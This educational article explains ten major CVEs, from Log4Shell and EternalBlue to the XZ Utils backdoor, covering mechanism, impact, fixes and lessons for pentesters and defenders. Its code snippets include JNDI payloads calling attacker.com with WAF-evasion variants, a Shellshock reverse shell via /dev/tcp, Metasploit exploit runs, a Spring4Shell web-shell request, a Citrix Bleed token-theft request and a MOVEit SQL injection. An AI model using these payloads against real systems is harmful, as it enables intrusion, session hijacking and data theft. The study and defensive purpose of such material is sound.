10 Real-World CVEs Explained: What Every Security Professional Must Learn (2026)

Top 10 CVE Explained
Top 10 CVE Explained
By HOC Team  |  Last updated: June 2026  |  Read time: ~22 min

The best way to understand how to defend systems is to understand exactly how they were broken. Every major CVE in history is a masterclass in how attackers think, how software fails, and how a single overlooked vulnerability can cascade into a global crisis. Log4Shell brought down enterprise infrastructure worldwide. EternalBlue powered the WannaCry ransomware that paralysed hospitals. Heartbleed silently exposed private keys, passwords, and session tokens for two years before anyone noticed.

This guide walks through 10 of the most important CVEs ever disclosed — not just what they are, but how they worked at a technical level, the real-world damage they caused, how they were patched, and critically — what you as an ethical hacker or security professional must take away from each one. Whether you are preparing for a SOC Analyst interview, studying for OSCP, or hunting bugs on HackerOne, understanding these vulnerabilities will make you a better security professional.

At the end you will find a reference table of all 10. Jump to summary table →

📖 How to use this guide Each CVE entry follows the same structure: a plain-English explanation of what the vulnerability is, how the attack works technically, what the real-world impact was, how it was fixed, and the key lesson for penetration testers and defenders. Read them in order or jump to any CVE using the table of contents.
The 10 most important CVEs every security professional must know
1
Log4Shell — Apache Log4j Remote Code Execution
CVE-2021-44228  ·  CVSS Score: 10.0 (Maximum)
CRITICAL
Disclosed
Dec 9, 2021
CVSS Score
10.0 / 10
Type
RCE
Auth needed
None
Affected
Billions of devices
What is it?

Log4j is a Java logging library used in an estimated 3 billion devices worldwide — from enterprise servers to cloud platforms to video games (including Minecraft). Log4Shell is a critical vulnerability in Log4j versions 2.0-beta9 through 2.14.1 that allows an attacker to execute arbitrary code on any server that logs attacker-controlled input.

The beauty — and horror — of Log4Shell is its simplicity. Log4j had a feature called JNDI (Java Naming and Directory Interface) lookup that allowed it to dynamically load content from external servers. An attacker only needed to get a target application to log a specific string.

How the attack works

The attacker sends a malicious string in any field the server logs — a username, HTTP header, User-Agent, search query, or even a Wi-Fi network name. When Log4j processes the string, it interprets the JNDI lookup instruction, reaches out to the attacker's server, downloads a malicious Java class file, and executes it on the target machine.

# Step 1: Attacker sends this string in ANY logged field ${jndi:ldap://attacker.com:1389/exploit}# Step 2: Vulnerable server receives and LOGS the string # Step 3: Log4j parses the ${} expression # Step 4: Log4j makes an LDAP request to attacker.com:1389 # Step 5: Attacker's server responds with a Java class URL # Step 6: Log4j downloads and EXECUTES the malicious class # Result: Attacker has Remote Code Execution on the target# Obfuscated bypasses used to evade WAF rules: ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.com/x} ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com/x}
Real-world impact
  • Within 72 hours of disclosure, over 1.8 million exploitation attempts were observed globally
  • Affected products included Apple iCloud, Amazon AWS, Microsoft Azure, Cloudflare, Tesla, Twitter, Minecraft, and thousands of enterprise Java applications
  • Nation-state APT groups (Iran, North Korea, China, Turkey) were exploiting Log4Shell within hours of public disclosure
  • The Belgian Defence Ministry confirmed a breach within days of the CVE going public
  • The US CISA called it "one of the most serious vulnerabilities" ever seen and mandated federal agencies patch within days
How it was fixed

Apache released Log4j 2.15.0 within days, disabling JNDI lookups by default. A second bypass was immediately found (CVE-2021-45046), requiring 2.16.0. The final fix was 2.17.0. The correct mitigation was updating to Log4j 2.17.1+ or setting log4j2.formatMsgNoLookups=true.

🎯 Key lesson for security professionals Log4Shell teaches three things: (1) supply chain risk — a single library dependency used inside hundreds of other products becomes a single point of global failure; (2) input validation is not enough — the vulnerability was in the logging infrastructure, not the application logic; (3) always check transitive dependencies, not just direct ones. When hunting in bug bounty, any Java application pre-2022 is worth probing with Log4Shell payloads in every header and input field.
2
EternalBlue — WannaCry and NotPetya Ransomware Fuel
CVE-2017-0144  ·  CVSS Score: 9.3
CRITICAL
Disclosed
Apr 14, 2017
CVSS Score
9.3 / 10
Type
RCE / Wormable
Auth needed
None
Protocol
SMBv1 (Port 445)
What is it?

EternalBlue is a vulnerability in Microsoft's SMBv1 (Server Message Block) protocol — the file-sharing protocol used across Windows networks. Originally developed and weaponised by the NSA, it was stolen and leaked by the Shadow Brokers hacking group in April 2017. Microsoft had actually patched it one month earlier (MS17-010 in March 2017) — but millions of Windows machines remained unpatched.

How the attack works

EternalBlue exploits a buffer overflow in the SMBv1 SrvOs2FeaToNt function. By sending a specially crafted packet to port 445, an attacker can write shellcode into kernel memory and execute it with SYSTEM-level privileges — without any authentication, without any user interaction, and without any warning to the victim.

# In Metasploit — the most commonly used exploit module use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.10 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.5 run# Check if a target is vulnerable with Nmap NSE script nmap -p 445 --script smb-vuln-ms17-010 192.168.1.10# Output if vulnerable: # VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1
Real-world impact
  • WannaCry (May 2017) — ransomware using EternalBlue infected 200,000+ machines in 150 countries in 72 hours. UK NHS hospitals were forced to turn away patients. Estimated damage: $4–8 billion.
  • NotPetya (June 2017) — a destructive wiper disguised as ransomware, also using EternalBlue. Caused $10 billion in damages globally. Maersk alone lost $300 million and had to reinstall 45,000 PCs and 4,000 servers from scratch.
  • EternalBlue remains active in the wild in 2026 — millions of unpatched Windows 7 and Windows Server 2008 machines still exist, particularly in industrial and healthcare environments.
How it was fixed

Microsoft released patch MS17-010 in March 2017 — before the leak. In May 2017, Microsoft took the unprecedented step of releasing patches for Windows XP, Vista, and Server 2003 — operating systems it had already ended support for — due to the severity of the outbreak.

🎯 Key lesson for security professionals EternalBlue is essential knowledge for any penetration tester or SOC analyst. In a pentest, always scan for SMBv1 with nmap --script smb-vuln-ms17-010. In a SOC role, alert on any external connection attempts to port 445 and on Mimikatz-related process names (EternalBlue is frequently paired with credential dumping post-exploitation). Patch management is not optional — MS17-010 was available a month before WannaCry and most victims simply hadn't applied it.
3
Heartbleed — OpenSSL Memory Disclosure
CVE-2014-0160  ·  CVSS Score: 7.5
CRITICAL
Disclosed
Apr 7, 2014
CVSS Score
7.5 / 10
Type
Info Disclosure
Existed
~2 years silently
Affected
17% of internet
What is it?

Heartbleed is a memory disclosure vulnerability in OpenSSL — the cryptographic library used to implement SSL/TLS encryption for the majority of the internet. It existed silently for over two years (since December 2011) before being discovered in April 2014, meaning attackers potentially had undetected access to private keys, passwords, and session tokens across millions of HTTPS websites.

The bug is in the TLS Heartbeat extension — a mechanism that keeps SSL connections alive. The server was supposed to echo back whatever the client sent in a heartbeat request. But it never verified the claimed length of the message.

How the attack works

The attacker sends a heartbeat request claiming it contains 64KB of data, but actually only sends 1 byte. The vulnerable OpenSSL server echoes back 64KB of server memory — whatever happens to be in those memory addresses at that moment. This could include: private SSL/TLS keys, session tokens, usernames and passwords, encryption keys, and any other data the server has in memory.

# Check if a target is vulnerable with Nmap nmap -p 443 --script ssl-heartbleed 192.168.1.10# If vulnerable: # VULNERABLE: The Heartbleed Bug is a serious vulnerability # State: VULNERABLE # Risk factor: High # Description: OpenSSL versions 1.0.1 and 1.0.2-beta releases # up to and including 1.0.1f and 1.0.2-beta1 contain a flaw # in its implementation of the TLS/DTLS heartbeat functionality# What the leaked memory looks like (real example redacted): ....user=admin&password=S3cr3tP@ss...session_token=abc123xyz... private_key=-----BEGIN RSA PRIVATE KEY-----...
Real-world impact
  • Estimated 17% of all HTTPS web servers were vulnerable at time of disclosure — approximately 500,000 websites
  • Major services affected included Yahoo Mail, LastPass, OKCupid, Imgur, and many others
  • Canada Revenue Agency had 900 Social Insurance Numbers stolen via Heartbleed and had to take systems offline
  • Because the attack left no logs, it is impossible to know how long attackers had been silently exfiltrating data before disclosure
How it was fixed

OpenSSL 1.0.1g patched the bug on the same day it was publicly disclosed. The fix: validate that the requested response length does not exceed the actual message length before reading from memory. After patching, all SSL certificates and session tokens had to be reissued because any previously issued cert could have been compromised.

🎯 Key lesson for security professionals Heartbleed demonstrates that vulnerabilities in shared infrastructure libraries — used by millions of systems — have an outsized impact compared to application-level bugs. Always check TLS libraries with nmap --script ssl-heartbleed during a pentest. In bug bounty, older web servers running OpenSSL 1.0.1 through 1.0.1f are still found occasionally on legacy applications. The lack of logs is the nightmare scenario for defenders — this is why memory-safe languages and regular library audits matter.
4
Shellshock — Bash Remote Code Execution
CVE-2014-6271  ·  CVSS Score: 10.0
CRITICAL
Disclosed
Sep 24, 2014
CVSS Score
10.0 / 10
Type
RCE
Existed
~25 years
Vector
CGI / DHCP / SSH
What is it?

Shellshock is a vulnerability in the GNU Bash shell that had existed for approximately 25 years before being discovered in 2014. Bash allows environment variables to contain function definitions. The bug: Bash would execute any code appended after a function definition in an environment variable — code that should never have been run at all.

This became catastrophic because of CGI (Common Gateway Interface) web scripts — a mechanism where web servers pass HTTP headers and parameters to shell scripts as environment variables. An attacker could embed malicious code in HTTP headers like User-Agent or Referer and have the web server execute it.

How the attack works
# The core Shellshock test — if this executes, bash is vulnerable env x='() { :;}; echo "VULNERABLE"' bash -c "echo test" VULNERABLE test# CGI web server exploit via HTTP header (reverse shell) curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/192.168.1.5/4444 0>&1" http://target.com/cgi-bin/status# Nmap detection script nmap -p 80 --script http-shellshock 192.168.1.10# What the payload means: # () { :;}; = valid bash function definition (triggers the parser) # after the ; = arbitrary commands Bash executes blindly
Real-world impact
  • Within 24 hours of disclosure, botnets were actively scanning the entire internet for vulnerable CGI scripts
  • Yahoo confirmed a breach via Shellshock — attackers gained access to servers via a vulnerable CGI script
  • Shellshock also affected DHCP clients — a malicious DHCP server on the same network could exploit it to compromise Linux machines requesting IP addresses
  • Akamai's networks were used to distribute Shellshock-based malware within days
🎯 Key lesson for security professionals Shellshock illustrates the age-old problem: trusted software (Bash has been on almost every Unix system since 1989) can contain critical vulnerabilities that existed for decades before discovery. CGI scripts are still found on legacy web servers — always run nmap --script http-shellshock during web application pentests. In CTFs, web challenges with old Linux servers frequently include Shellshock as the intended exploitation path.
5
BlueKeep — Wormable RDP Remote Code Execution
CVE-2019-0708  ·  CVSS Score: 9.8
CRITICAL
Disclosed
May 14, 2019
CVSS Score
9.8 / 10
Type
RCE / Wormable
Protocol
RDP (Port 3389)
Auth needed
None
What is it?

BlueKeep is a use-after-free vulnerability in Windows Remote Desktop Services (RDS) that allows an unauthenticated attacker to execute arbitrary code remotely on systems with RDP exposed on port 3389. Microsoft described it as "wormable" — meaning it could self-propagate across networks the same way WannaCry did — and compared it to EternalBlue in severity.

Affected systems: Windows 7, Windows Server 2003, 2008, and 2008 R2. Windows 8 and Windows 10 were not affected.

How the attack works

The vulnerability exists in the handling of Channel objects in RDP. By sending specially crafted pre-authentication RDP packets, an attacker can free a memory channel object and then trigger code execution in the freed memory region (use-after-free). No user interaction is needed and no authentication is required — connecting to port 3389 is enough.

# Check if target is vulnerable to BlueKeep with Metasploit scanner use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set RHOSTS 192.168.1.0/24 run[+] 192.168.1.15:3389 - The target is vulnerable to CVE-2019-0708 (BlueKeep)# Nmap detection nmap -p 3389 --script rdp-vuln-ms12-020 192.168.1.15
Real-world impact
  • At time of disclosure, security researchers identified nearly 1 million internet-facing Windows systems vulnerable to BlueKeep
  • A mass exploitation event occurred in November 2019 — attackers deployed cryptocurrency miners via BlueKeep on thousands of machines
  • Unlike WannaCry, no large-scale worm emerged — but BlueKeep remains actively used in targeted attacks, particularly against internet-exposed RDP servers (a common vector for ransomware gangs)
  • The NSA issued a rare public advisory urging immediate patching
🎯 Key lesson for security professionals Never expose RDP (port 3389) directly to the internet. If RDP access is needed, require it through a VPN. During pentests and external recon, always scan for open port 3389 and run the BlueKeep check — unpatched Windows 7 and Server 2008 machines are still regularly found in corporate environments. In a SOC role, any external connection attempt to port 3389 should generate a high-priority alert.
6
PrintNightmare — Windows Print Spooler Privilege Escalation
CVE-2021-34527  ·  CVSS Score: 8.8
HIGH
Disclosed
Jul 1, 2021
CVSS Score
8.8 / 10
Type
LPE + RCE
Service
Windows Spooler
Result
SYSTEM access
What is it?

PrintNightmare is a vulnerability in the Windows Print Spooler service that runs on all Windows machines by default. The vulnerability allows any authenticated user — even a low-privileged domain user — to install printer drivers that execute code with SYSTEM-level privileges. It can also be used for remote code execution across a network.

The CVE was accidentally made public before a patch existed when security researchers accidentally published a proof-of-concept on GitHub, believing Microsoft had already released a fix. It was removed within hours but had already been forked hundreds of times.

How the attack works

The Windows Print Spooler allows users to install printer drivers. The AddPrinterDriverEx function does not properly validate the privilege level of the calling user. An attacker with any valid domain credentials can call this function to load a malicious DLL that runs as SYSTEM — giving full control of the machine.

# Metasploit module for PrintNightmare use exploit/windows/dcerpc/cve_2021_1675_printnightmare set RHOSTS 192.168.1.10 set SMBUser lowprivuser set SMBPass Password123 run[*] Sending stage (200262 bytes) to 192.168.1.10 [*] Meterpreter session 1 opened meterpreter > getuid Server username: NT AUTHORITY\SYSTEM# The attack path: low-privilege domain user → SYSTEM in seconds
Real-world impact
  • Ransomware groups including Magniber, Vice Society, and Conti began using PrintNightmare within weeks of disclosure
  • Particularly damaging in Active Directory environments — any domain user could escalate to Domain Admin if a Domain Controller had Print Spooler running (which many did by default)
  • Microsoft's initial patch was incomplete and bypassed within 24 hours, requiring multiple re-patches over several weeks
🎯 Key lesson for security professionals PrintNightmare is a staple in OSCP and Active Directory pentesting methodology. Any time you have a low-privilege user in a Windows domain environment, check if Print Spooler is running on domain controllers (sc \\dc01 query spooler). If it is running and unpatched, you likely have a path to Domain Admin. Defenders should disable the Print Spooler service on all machines that do not need to print.
7
Spring4Shell — Spring Framework Remote Code Execution
CVE-2022-22965  ·  CVSS Score: 9.8
CRITICAL
Disclosed
Mar 31, 2022
CVSS Score
9.8 / 10
Type
RCE
Framework
Spring MVC / WebFlux
Auth needed
None
What is it?

Spring4Shell is a critical vulnerability in the Spring Framework — one of the most widely used Java application frameworks in the world, particularly in enterprise environments. The vulnerability allows an unauthenticated attacker to achieve remote code execution by manipulating class loader properties through HTTP request parameters.

The name "Spring4Shell" was coined due to its similarity to Log4Shell — both are Java-based, both are unauthenticated RCE, and both affect frameworks used in millions of enterprise applications. Media comparisons to Log4Shell created significant panic when it was disclosed.

How the attack works

Spring's data binding feature allows HTTP request parameters to be bound to Java object properties. By manipulating parameters that control the class.classLoader object, an attacker can write a malicious JSP web shell to the server's web root — which can then be accessed via the browser to execute arbitrary OS commands.

# Proof of concept HTTP request to exploit Spring4Shell # Writes a JSP web shell to the web rootcurl -v http://target.com/vulnerable-endpoint \ -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di+if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B+java.io.InputStream+in+%3D+%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B+...+%7D%25%7Bsuffix%7Di"# After the web shell is written, access it: curl http://target.com/shell.jsp?pwd=j&cmd=id uid=0(root) gid=0(root) groups=0(root)
Real-world impact
  • Exploitation attempts began within hours of public proof-of-concept code being released
  • Mirai botnet variants began incorporating Spring4Shell exploits within days
  • Unlike Log4Shell, Spring4Shell had more specific requirements (Java 9+, Tomcat deployment, specific Spring configuration) which limited its overall impact — but targeted exploitation against enterprise Java applications was significant
🎯 Key lesson for security professionals Spring4Shell illustrates the problem with data binding in frameworks — features designed for developer convenience (automatic parameter binding) can become critical attack surfaces when input is not properly restricted. When pentesting Java web applications, always identify the framework version. Any Spring application running on Java 9+ with Tomcat before Spring Framework 5.3.18 / 5.2.20 is potentially vulnerable.
8
Citrix Bleed — Session Token Hijacking
CVE-2023-4966  ·  CVSS Score: 9.4
CRITICAL
Disclosed
Oct 10, 2023
CVSS Score
9.4 / 10
Type
Session Hijack
Product
Citrix ADC / Gateway
Auth needed
None
What is it?

Citrix Bleed is a sensitive information disclosure vulnerability in Citrix NetScaler ADC and NetScaler Gateway appliances — widely used in enterprise networks for load balancing, VPN access, and application delivery. The vulnerability allows an unauthenticated attacker to retrieve valid session tokens from device memory, effectively bypassing authentication and MFA entirely.

The name "Citrix Bleed" was coined due to its similarity to Heartbleed — both leak sensitive data from memory without needing credentials.

How the attack works

By sending a specially crafted HTTP GET request to the NetScaler management interface, an attacker can trigger a buffer over-read that leaks up to 256 bytes of memory per request. This memory frequently contains valid authentication session tokens. With a stolen token, the attacker can log in as any user — including administrators — bypassing passwords and MFA entirely.

# Proof of concept — send malformed request to leak memory curl -k -v https://citrix-target.com/oauth/idp/.well-known/openid-configuration \ -H "Host: $(python3 -c 'print("A"*24576)')"# The response includes leaked memory containing session tokens: # Look for strings matching: NSC_AAAA[a-zA-Z0-9+/]+ (Citrix session cookie format)# With the stolen session token — authenticate as any user curl -k https://citrix-target.com/vpn/index.html \ -H "Cookie: NSC_AAAA=stolen_session_token_here"
Real-world impact
  • LockBit ransomware group exploited Citrix Bleed to breach Boeing, China Industrial Bank (ICBC), Allen & Overy law firm, and DP World in late 2023
  • ICBC's US operations were so severely disrupted that traders had to hand-deliver trade data on USB drives
  • Mandiant reported that exploitation had been occurring since at least August 2023 — two months before Citrix disclosed it
  • CISA issued an emergency directive mandating federal agencies patch within days
🎯 Key lesson for security professionals Citrix Bleed is a masterclass in why patching appliances and network edge devices must be as high a priority as patching servers. VPN gateways and load balancers are often overlooked in patch management processes. For pentesters: always identify Citrix NetScaler versions during external recon. For defenders: patch management must include all network appliances, not just Windows endpoints. MFA is not a defence against session token theft — once a valid token is stolen, MFA has already been passed.
9
MOVEit Transfer SQL Injection — Cl0p Ransomware Wave
CVE-2023-34362  ·  CVSS Score: 9.8
CRITICAL
Disclosed
May 31, 2023
CVSS Score
9.8 / 10
Type
SQL Injection → RCE
Auth needed
None
Victims
2,700+ organisations
What is it?

MOVEit Transfer is a managed file transfer (MFT) application used by thousands of enterprises and government agencies to transfer sensitive files securely. The vulnerability is an unauthenticated SQL injection in MOVEit's web application that allows attackers to read, modify, and delete data from the database — and ultimately execute OS commands on the underlying server.

The Cl0p ransomware group exploited this vulnerability in a mass exploitation campaign in May–June 2023, stealing data from over 2,700 organisations before a patch was even publicly available.

How the attack works

The vulnerability exists in the human.aspx endpoint in MOVEit's web application. By manipulating the X-siLock-Comment HTTP header with SQL injection payloads, an attacker can bypass authentication and query the database directly. Cl0p automated this to steal the sysadmin session token from the database and then upload a web shell called LEMURLOOT to the server.

# Simplified SQL injection payload targeting the auth bypass # Sent in X-siLock-Comment header to /human.aspx'; SELECT session_id, LoginName FROM sessions WHERE LoginName='sysadmin'--# With the stolen session token, upload LEMURLOOT web shell # LEMURLOOT can: list files, download files, create admin accounts# Cl0p automated detection of vulnerable instances using: shodan search "MOVEit Transfer" # Returned thousands of internet-exposed MOVEit instances
Real-world impact
  • Over 2,700 organisations confirmed breached — the largest single vulnerability exploitation campaign of 2023
  • Victims included US Department of Energy, Shell, British Airways, BBC, Boots pharmacy, Johns Hopkins University, Sony, PricewaterhouseCoopers, Ernst & Young, and many others
  • Data from 93 million individuals was stolen and published on Cl0p's leak site
  • Total estimated damages exceeded $9.9 billion according to Emsisoft's analysis
🎯 Key lesson for security professionals The MOVEit breach is the clearest recent example of why managed file transfer systems and file sharing applications must be treated as high-value attack targets during pentests — they frequently hold the most sensitive data in an organisation and often lack the same security scrutiny as customer-facing applications. SQL injection in enterprise software in 2023 remains tragically common. For bug bounty hunters: MFT applications, HR systems, and financial software are high-value targets with fewer hunters and higher bounties.
10
XZ Utils Backdoor — Supply Chain Attack
CVE-2024-3094  ·  CVSS Score: 10.0
CRITICAL
Disclosed
Mar 29, 2024
CVSS Score
10.0 / 10
Type
Supply Chain / Backdoor
Target
Linux SSH (sshd)
Campaign
~2 years
What is it?

The XZ Utils backdoor is unlike any other CVE on this list. It was not a coding mistake — it was a deliberately planted backdoor, inserted by a sophisticated threat actor who spent nearly two years building trust as an open-source contributor before introducing malicious code into a widely-used Linux compression library.

XZ Utils is a data compression library used across virtually all Linux distributions. Because it is linked into systemd — and systemd is linked into sshd (the SSH daemon) on many modern Linux systems — a backdoor in XZ Utils effectively becomes a backdoor in SSH itself. The backdoor was designed to allow the attacker to authenticate to any affected system using a specific private key, bypassing all authentication.

How the attack works

The threat actor, operating under the alias "Jia Tan", began contributing to the XZ Utils project in 2021. Over two years they built a reputation for quality contributions. In 2024 they introduced malicious code into XZ Utils 5.6.0 and 5.6.1, hidden across multiple commits, disguised as test files and build scripts, and obfuscated using multiple layers of encoding.

# The backdoor was discovered accidentally by Andres Freund # while investigating unusual CPU usage and slow SSH logins# Check if your system is vulnerable xz --version # Vulnerable: xz (XZ Utils) 5.6.0 or 5.6.1 # Safe: 5.4.x (most stable distro releases) or 5.6.2+# Check which XZ version your SSH links against (Linux) ldd /usr/sbin/sshd | grep liblzma# The backdoor mechanism (simplified): # 1. XZ build scripts inject malicious code into liblzma # 2. sshd links against liblzma via systemd # 3. Backdoor hooks RSA key verification in sshd # 4. Attacker's hardcoded public key bypasses all auth checks # 5. Attacker gains unauthenticated RCE on any affected SSH server
Real-world impact
  • The backdoor was caught early — Fedora 41 beta and some rolling-release distros (Arch, Debian Testing) had distributed the vulnerable version, but it had not reached stable releases of major distributions
  • The attacker's two-year patient campaign and sophisticated obfuscation techniques suggest a nation-state actor or well-resourced APT group
  • If undetected and widely distributed, this would have been the most catastrophic Linux security incident in history — effectively a master key to SSH on every affected system
  • The discovery has triggered an industry-wide rethink of open-source supply chain security and maintainer vetting processes
🎯 Key lesson for security professionals XZ Utils is the defining supply chain security event of 2024. It demonstrates that the attack surface for sophisticated actors now includes open-source project maintainers themselves. For defenders: implement software composition analysis (SCA) tools that alert on unexpected library version changes. For pentesters and bug bounty hunters: supply chain attacks are an emerging target — understanding dependency chains and build processes is becoming a core security skill. This CVE also validates why reproducible builds matter — being able to verify that a compiled binary matches the source code is now a security requirement, not a nice-to-have.
Summary reference table — all 10 CVEs
#CVE IDNameTypeCVSSYearKey impact
1CVE-2021-44228Log4ShellRCE10.020213 billion+ devices, global exploitation within hours
2CVE-2017-0144EternalBlueRCE / Wormable9.32017WannaCry ($4B damage), NotPetya ($10B damage)
3CVE-2014-0160HeartbleedInfo Disclosure7.52014500K+ HTTPS sites, private keys exposed silently for 2yrs
4CVE-2014-6271ShellshockRCE10.0201425-year-old Bash bug, Yahoo breach, mass botnet exploitation
5CVE-2019-0708BlueKeepRCE / Wormable9.820191M+ vulnerable RDP servers, cryptomining campaigns
6CVE-2021-34527PrintNightmareLPE + RCE8.82021Low-priv user → SYSTEM, ransomware escalation
7CVE-2022-22965Spring4ShellRCE9.82022Spring Framework, Mirai botnet exploitation
8CVE-2023-4966Citrix BleedSession Hijack9.42023LockBit breached Boeing, ICBC, MFA bypassed
9CVE-2023-34362MOVEit SQLiSQLi → RCE9.820232,700+ orgs breached, 93M records stolen by Cl0p
10CVE-2024-3094XZ BackdoorSupply Chain10.020242-year nation-state campaign targeting Linux SSH
💡 The pattern across all 10 CVEs Look at what connects them: trusted software (Log4j, Bash, OpenSSL, SMB), unauthenticated attack paths, and global impact from a single vulnerability. The lesson is consistent — patch fast, limit attack surface, assume breach, and always scan for these in penetration tests. The most dangerous vulnerabilities are the ones in code everyone trusts and no one scrutinises.

⚡ Put this knowledge to work

  1. Scan for these in your lab — set up Metasploitable 2 and run nmap --script vuln against it. You will find EternalBlue (MS17-010), vsftpd backdoor, and more — then use Metasploit to exploit each one. Nmap tutorial →
  2. Learn the exploitation tools — every CVE here has a Metasploit module. Learn how to use them in an authorised lab environment. Metasploit tutorial →
  3. Start bug bounty hunting — MOVEit and Spring4Shell style vulnerabilities appear in enterprise web applications on bug bounty programs constantly. Bug bounty beginners guide →
  4. Follow CVEs as they drop — subscribe to CISA KEV (Known Exploited Vulnerabilities) catalogue, NVD (nvd.nist.gov), and Packet Storm Security for live CVE intelligence.
  5. Build your Kali toolkit — the commands used to detect and exploit these CVEs are all in your foundational toolkit. Top 20 Kali Linux commands →
Frequently asked questions
What does CVE stand for?

CVE stands for Common Vulnerabilities and Exposures. It is a standardised list of publicly disclosed cybersecurity vulnerabilities maintained by MITRE Corporation and sponsored by the US Department of Homeland Security. Each CVE entry gets a unique ID in the format CVE-YEAR-NUMBER (e.g., CVE-2021-44228 for Log4Shell). The CVSS (Common Vulnerability Scoring System) score from 0–10 indicates severity.

What is the most dangerous CVE ever discovered?

Log4Shell (CVE-2021-44228) is widely considered the most dangerous CVE in history due to its combination of a perfect CVSS score of 10.0, unauthenticated remote code execution, and the fact that it affected an estimated 3 billion devices across nearly every major technology company and enterprise application. EternalBlue is a close second due to its role in WannaCry and NotPetya, which caused over $14 billion in combined damages.

How do I check if a system is vulnerable to a specific CVE?

The most common methods are: running Nmap with the relevant NSE vulnerability script (e.g., nmap --script smb-vuln-ms17-010 for EternalBlue), using Metasploit's auxiliary scanner modules, running a vulnerability scanner like OpenVAS or Tenable Nessus, or checking the installed software version against the vulnerable version range listed in the CVE database at nvd.nist.gov.

What is the difference between a CVE and an exploit?

A CVE is simply the standardised identifier and description of a vulnerability — it describes the flaw but does not provide attack code. An exploit is the actual code or technique used to take advantage of the vulnerability. Many CVEs have publicly available proof-of-concept exploits on Exploit-DB or GitHub, and the most critical ones have Metasploit modules that make exploitation accessible without custom code development.

How can I stay up to date on new CVEs?

The best sources are: the CISA Known Exploited Vulnerabilities (KEV) catalogue at cisa.gov/known-exploited-vulnerabilities-catalog (the most critical actively exploited CVEs), the National Vulnerability Database at nvd.nist.gov (all CVEs with CVSS scores), vendor security advisories (Microsoft Patch Tuesday, Apache Security Updates, etc.), and The Hacker News for news coverage of major vulnerabilities as they are disclosed.

Are these CVEs still relevant in 2026?

Yes — all 10 CVEs covered in this guide remain actively exploited in 2026. EternalBlue and BlueKeep still successfully compromise unpatched Windows 7 and Server 2008 machines found in industrial, healthcare, and small business environments. Log4Shell continues to be exploited because many organisations still have unpatched Java applications in their environment. Understanding historical CVEs is not just academic — these vulnerabilities are being used in real attacks against real organisations today.

Previous Article
How to Become a SOC Analyst

How to Become a SOC Analyst With No Experience (Step-by-Step 2026)

Related Posts